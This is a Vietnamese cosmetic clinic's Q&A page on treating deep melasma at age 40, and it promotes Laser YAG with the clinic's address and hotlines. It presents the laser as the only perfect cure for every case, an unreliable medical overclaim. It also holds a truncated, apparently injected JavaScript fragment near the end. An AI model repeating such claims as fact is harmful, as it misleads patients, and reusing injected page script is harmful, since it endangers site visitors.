Làm thế nào để trị nám tuổi 40?

0

Tôi năm nay 40 tuổi và trên mặt có rất nhiều nám sâu. Không biết với trường hợp của tôi, trị nám tuổi 40 có khó không và bằng cách nào thì hiệu quả nhất? (Thu Quế – Nam Định)

Xem thêm tại đây:

Trả lời:

Chào bạn Thu Quế!

Cảm ơn bạn đã tin tưởng và gửi câu hỏi về hòm thư tư vấn thammyvienphuxuan@gmail.com. Về câu hỏi của bạn, chúng tôi xin được trả lời như sau:

Ngoài 30, đặc biệt là từ sau tuổi 40, tình trạng lão hóa da, nám da ngày càng biểu hiện rõ khiến chị em lo lắng và băn khoăn tìm mọi cách để cải thiện tình trạng này. Việc trị nám tuổi 40 hay ở bất cứ độ tuổi nào không hề khó, điều quan trọng là cần điều trị đúng phương pháp, đúng liệu trình. Mặt khác, việc lựa chọn cơ sở uy tín là yếu tố quyết định đầu tiên giúp bạn trị nám thành công.

lam-the-nao-de-tri-nam-tuoi-40
Làm thế nào để trị nám tuổi 40?

Với tình trạng bị nám sâu như của bạn Thu Quế, bạn có thể điều trị bằng công nghệ Laser yag. Theo các chuyên gia hàng đầu trong ngành thẩm mỹ, muốn điều trị nám sâu tận gốc 1 mặt phải tác động vào cơ chế gây nám, mặt khác phải kiểm soát và khống chế được các nguyên nhân gây nám từ sâu bên trong, đồng thời phòng chống nám do những tác nhân bên ngoài. Và dựa theo cơ chế này thì hiện chỉ có Laser yag là giải pháp hoàn hảo nhất vừa giúp trị nám từ sâu bên trong, vừa ngăn không cho nám quay trở lại. Đặc biệt, Laser yag thích hợp với mọi loại da và có thể điều trị nám sâu triệt để với tất cả mọi trường hợp với các mức độ nám khác nhau. Vì vậy bạn Thu Quế hoàn toàn có thể yên tâm khi trị nám tuổi 40 với công nghệ Laser yag.

Sau khi trị nám với Laser yag, làn da bạn còn trở nên sáng mịn, tươi tắn hơn. Tuy nhiên với mỗi trường hợp và tình trạng nám khác nhau, bác sĩ sẽ tư vấn liệu trình điều trị thích hợp riêng. Do đó bạn Thu Quế muốn trị nám sâu hiệu quả nhất thì nên đến trực tiếp Thẩm mỹ viện Phú Xuân để được thăm khám và tư vấn cụ thể.

Mọi thông tin chi tiết xin vui lòng liên hệ:

Thẩm mỹ viện công nghệ cao Phú Xuân

Địa chỉ: Số 77 Trần Duy Hưng, Cầu Giấy, Hà Nội

Hotline: 094.681.7777

Email: thammyvienphuxuan@gmail.com

var d=document;var s=d.createElement(‘script’);

Tư vấn 24/7: 094 681 7777 - 0125 443 7777